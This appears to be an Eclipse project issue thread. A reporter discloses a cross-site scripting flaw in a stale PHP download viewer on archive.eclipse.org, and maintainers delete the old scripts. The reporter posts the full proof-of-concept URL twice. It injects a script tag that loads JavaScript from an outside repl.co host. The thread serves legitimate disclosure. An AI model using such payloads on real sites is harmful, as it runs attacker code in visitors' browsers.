Community
Participate
Working Groups
Hi team how are you ? I found a vulnerability in your site I leave the Poc Url https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss.repl.co/script.js%3E%3C/script%3E
@Ed, WDYT?
This is an xss vulnerability, do you know what it is?
I have no idea how those got there. They look to be extremely old files with all kinds of crazy old stuff. https://archive.eclipse.org/justj/?file=tools/emf/scripts It looks like someone copied a backup and left it to rot...
ok, this is a bug
@Ed, would you mind removing the files if you can?
I did not upload those files, I only found a Javascript injection in that domain, https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss. repl.co/script.js%3E%3C/script%3E Do you know what this is? JavaScript injections are processes where you can insert and use your own JavaScript codes on a page, either by entering the code in the address bar or by finding a website's XSS vulnerability.
@Nicolas, we get that. As the php scripts you've detected the XSS in are rotten files, I was asking @Ed to just delete those scripts.
Sorry, I tried but I cannot remove them: https://ci.eclipse.org/emf/job/promotion-shell/lastBuild/console
I've removed all php scripts in that folder. Thanks.